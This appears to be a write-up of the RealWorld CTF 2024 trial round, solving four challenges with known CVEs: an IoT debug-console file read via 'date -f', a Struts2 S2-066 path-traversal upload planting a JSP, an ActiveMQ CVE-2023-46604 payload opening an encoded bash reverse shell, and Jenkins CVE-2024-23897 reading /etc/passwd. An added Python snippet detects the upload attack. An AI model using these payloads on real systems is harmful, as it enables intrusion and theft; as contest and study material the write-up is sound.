RealWorld 2024 Writeup

Preface

Having nothing better to do, I signed up for the trial contest, which is only about 40% of the difficulty of the international round. A quick look at the challenges: well, I couldn't do a single one. Then I figured that Real World challenges should all test recent CVEs; in the end I solved 4 and ranked fairly high, which feels okay. Also, Be-an-Interpreter-Hacker should be CVE-2023-28879, but I didn't succeed…

vision

This is the debug console of an IoT device. The device is not intended to provide the shell. For debugging purposes, the vendor provides a protected shell to execute basic debug commands. Are you able to access the unrestricted shell for this device?

Visiting the environment, it asks you to brute-force a sha256. After thinking about it for ages I couldn't write one, then suddenly noticed that a brute-force script is provided: WinMin/solve.py

After connecting to the newly given address and entering help, I found that only some commands could be executed. I spent ages analysing it in IDA without understanding it, then suddenly remembered that date has a trick for reading files, so this challenge was probably solved in an unintended way.

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -v 47.96.229.249 34567
47.96.229.249: inverse host lookup failed: Unknown host
(UNKNOWN) [47.96.229.249] 34567 (?) open
Welcome to the debug console! Use "help" to see supported commands.
$ help
Supported commands: ping, uname, pwd, date, whoami, poweroff, id, showKey, openthedoor
$ date -f /flag
date: invalid date 'rwctf{tH1s_1z_th3_Fl4q_f0R_v1s10N_3D025DF9-B8}'

Be-More-Elegant

Grace Under Code, Be gentle please :)

I noticed that the upload URL ends in .action, so I guessed it was very likely a Struts2 vulnerability, which the provided challenge source later confirmed.

Here is the upload part of the code. Searching recent Struts2 file-upload vulnerabilities yields S2-066 (CVE-2023-50164); just reproduce it directly.

package be.more.elegant;

import com.opensymphony.xwork2.ActionSupport;
import java.io.File;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import javax.servlet.http.HttpServletRequest;
import org.apache.commons.io.FileUtils;
import org.apache.struts2.action.ServletRequestAware;

public class HeaderIconAction extends ActionSupport implements ServletRequestAware {
    public static final File UPLOAD_DIR = new File(HeaderIconAction.class.getClassLoader().getResource("../../statics/").getFile(), "uploads");

    private HttpServletRequest request;
    private String uploadedPath;
    private File fileUpload;
    private String fileUploadContentType;
    private String fileUploadFileName;

    public String execute() throws Exception {
        return "input";
    }

    public String doUpload() {
        try {
            String remoteAddr = this.request.getRemoteAddr();
            String md5ForIp = md5Ip(remoteAddr);
            File sandBox = new File(UPLOAD_DIR, md5ForIp);
            // fileUploadFileName is used as-is: a traversal sequence in it escapes sandBox
            File fileToCreate = new File(sandBox, this.fileUploadFileName);
            FileUtils.copyFile(this.fileUpload, fileToCreate);
            this.uploadedPath = "statics/uploads/" + md5ForIp + "/" + this.fileUploadFileName;
        } catch (Exception e) {
            return "error";
        }
        return "success";
    }

    // Per-client sandbox directory name: hex MD5 of the remote address
    public String md5Ip(String ip) throws NoSuchAlgorithmException {
        MessageDigest md = MessageDigest.getInstance("MD5");
        md.update(ip.getBytes());
        byte[] digest = md.digest();
        StringBuilder sb = new StringBuilder();
        for (byte b : digest) {
            sb.append(String.format("%02x", Integer.valueOf(b & 0xFF)));
        }
        return sb.toString();
    }

    public File getFileUpload() {
        return this.fileUpload;
    }

    public void setFileUpload(File fileUpload) {
        this.fileUpload = fileUpload;
    }

    public String getFileUploadContentType() {
        return this.fileUploadContentType;
    }

    public void setFileUploadContentType(String fileUploadContentType) {
        this.fileUploadContentType = fileUploadContentType;
    }

    public String getFileUploadFileName() {
        return this.fileUploadFileName;
    }

    // Public setter: the file name can be overridden by a separate request parameter
    public void setFileUploadFileName(String fileUploadFileName) {
        this.fileUploadFileName = fileUploadFileName;
    }

    public String getUploadedPath() {
        return this.uploadedPath;
    }

    public void withServletRequest(HttpServletRequest httpServletRequest) {
        this.request = httpServletRequest;
    }
}

Note that before sending the request, first change FileUpload to fileUpload so that a file is uploaded normally, then change it back.

POST http://47.99.57.31:8080/upload.action HTTP/1.1
Host: 47.99.57.31:8080
Content-Length: 348
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryarkq65pU6vLl6wRP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Connection: close

------WebKitFormBoundaryarkq65pU6vLl6wRP
Content-Disposition: form-data; name="FileUpload"; filename="a.txt"
Content-Type: image/jpeg

{shell}
------WebKitFormBoundaryarkq65pU6vLl6wRP
Content-Disposition: form-data; name="fileUploadFileName";
Content-Type: text/plain

../../../views/xxxxxx.jsp
------WebKitFormBoundaryarkq65pU6vLl6wRP--
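As an added example (not from the writeup or the challenge source), the following Python flags the S2-066 pattern in a multipart request shaped like the one above, and shows the file-name sanitisation that the action's new File(sandBox, fileUploadFileName) lacks. The request body, boundary and sandbox paths are constructed for the example.

```python
import posixpath
import re

# Constructed multipart body with the same shape as the request above
# (the uploaded content is replaced by a placeholder).
BOUNDARY = "----WebKitFormBoundaryarkq65pU6vLl6wRP"
BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="FileUpload"; filename="a.txt"\r\n'
    "Content-Type: image/jpeg\r\n\r\n<placeholder>\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="fileUploadFileName";\r\n'
    "Content-Type: text/plain\r\n\r\n../../../views/xxxxxx.jsp\r\n"
    f"--{BOUNDARY}--\r\n"
)
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

def parse_multipart(body, boundary):
    """Minimal multipart/form-data parser: (name, filename-or-None, value) per part."""
    parts = []
    for chunk in body.split("--" + boundary)[1:]:
        if chunk.startswith("--"):
            break  # closing delimiter
        headers, _, value = chunk.lstrip("\r\n").partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', headers)
        fname = re.search(r'filename="([^"]*)"', headers)
        if name:
            parts.append((name.group(1), fname.group(1) if fname else None,
                          value.rstrip("\r\n")))
    return parts

def find_s2_066(parts):
    """Flag a '<x>FileName' text field that overrides the name of file part <x>."""
    files = {n.lower(): n for n, f, _ in parts if f is not None}
    reasons = []
    for name, fname, value in parts:
        if fname is not None or not name.endswith("FileName"):
            continue
        base = name[: -len("FileName")]
        actual = files.get(base.lower())  # file part matching only case-insensitively
        if actual is not None and actual != base:
            reasons.append(f"case mismatch: file part {actual!r} vs field {name!r}")
        if actual is not None and TRAVERSAL.search(value):
            reasons.append(f"traversal in overridden file name {value!r}")
    return reasons

def safe_target(sandbox, filename):
    """Hardened counterpart of new File(sandBox, fileUploadFileName)."""
    name = posixpath.basename(filename.replace("\\", "/"))  # keep only the base name
    if name in ("", ".", ".."):
        return None
    target = posixpath.normpath(posixpath.join(sandbox, name))
    return target if target.startswith(sandbox.rstrip("/") + "/") else None
```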

Be-an-ActiveMq-Hacker

Welcome, seekers, to the game,
Where ActiveMQ’s name is not the same.
In this world of messages and queues,
A hidden flaw, in the news.

CVE-2023-46604, a code that’s key,
A vulnerability, you’ll soon see.
In this challenge, you are tasked,
To uncover secrets, masked and masked.

Explore the depths of ActiveMQ’s lair,
Where messages flow with utmost care.
But within this stream, a flaw does lie,
A door unlocked, beneath the sky.

Your mission, should you dare to dive,
Is to find this flaw, make it alive.
Exploit the gap, show your skill,
In this cyber world, where time stands still.

This is your chance to learn and probe,
In a digital world across the globe.
Seek the flaw in ActiveMQ’s core,
And open the door to cybersecurity lore.

So embark on this quest, both far and nigh,
Where codes and messages, in layers lie.
Find the key to CVE’s mystery,
And etch your name in cyber history!

The challenge description already gives the vulnerability ID explicitly, so just exploit it directly: sule01u/CVE-2023-46604

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
       http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC95b3VyX2lwLzUwMDAgMD4mMQ==}|{base64,-d}|{bash,-i}</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

We get a reverse shell directly and can then read the flag.
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvp 5000
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::5000
Ncat: Listening on 0.0.0.0:5000
Ncat: Connection from 120.26.63.137.
Ncat: Connection from 120.26.63.137:33094.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell

activemq@76390a168383:~$ cd /
activemq@76390a168383:/$ ./readflag
rwctf{N0w_Y0ur_4r3_G0od_H4ck3r_6d6}

Be-a-Security-Researcher

Participate in a security vulnerability emergency response

Visiting the environment, it states explicitly that Jenkins is used. Generally, contests like this mostly test command execution or file read vulnerabilities; searching recent vulnerabilities I found one that fits well, CVE-2024-23897.
┌──(kali㉿kali)-[~/Desktop]
└─$ java -jar .\jenkins-cli.jar -s http://47.96.171.129:8080/ who-am-i "@/etc/passwd"

ERROR: No argument is allowed: root:x:0:0:root:/root:/bin/bash
java -jar jenkins-cli.jar who-am-i
Reports your credential and permissions.

┌──(kali㉿kali)-[~/Desktop]
└─$ java -jar .\jenkins-cli.jar -s http://47.96.171.129:8080/ who-am-i "@/flag"

ERROR: No argument is allowed: rwctf{jenkins_no_vulner!!}
java -jar jenkins-cli.jar who-am-i
Reports your credential and permissions.

Author: iami233
Link: https://5ime.cn/realworld-2024.html
License: this article is licensed under CC BY-NC-SA 3.0 CN